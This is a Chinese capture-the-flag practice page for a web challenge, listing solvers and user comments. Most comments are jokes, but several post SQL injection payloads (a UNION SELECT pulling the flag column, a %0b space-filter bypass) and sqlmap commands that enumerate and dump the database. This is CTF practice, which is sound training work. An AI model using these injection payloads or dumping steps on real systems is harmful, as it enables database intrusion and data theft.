评分(22)
解题动态
有点易斯但不多 攻破了该题 7小时前
1293273679 攻破了该题 1天前
liuhang1208 攻破了该题 1天前
liberator 攻破了该题 1天前
l2 攻破了该题 1天前
15573930169 攻破了该题 1天前
19918070120 攻破了该题 1天前
Oliver23 攻破了该题 1天前
yinxaung 攻破了该题 1天前
zerogotcha 攻破了该题 1天前
西米露sml 攻破了该题 1天前
wmm1 攻破了该题 1天前
Siliovatolla 攻破了该题 1天前
bluesword 攻破了该题 1天前
3414586181 攻破了该题 1天前
砂糖白子 攻破了该题 1天前
tianyiya 攻破了该题 1天前
Hr 攻破了该题 2天前
熙楹 攻破了该题 2天前
评论
MONSTEinCAT 3年前
举报
鸡你太美
阿厂 3年前
举报
哎呦你干嘛
肥肠粉 3年前
举报
小黑子,哥哥下的蛋你别吃
Sauexceed 3年前
举报
小黑子
yemur 3年前
举报
id=-1' union select 1,2,3,skctf_flag from fl4g#
lysandria 3年前
举报
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
15338641414 3年前
举报
输入框的sql注入
Hey0iopklh 3年前
举报
'闭合,union注入
落叶满阶红 3年前
举报
这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag
02 3年前
举报
有的方法flag根本出不来
w1707154109 3年前
举报
超级简单的sql
放鹤 3年前
举报
为什么提交的flag不对
MONSTEinCAT 3年前
举报
要提交两次才行
夜雨 3年前
举报
简单的sql注入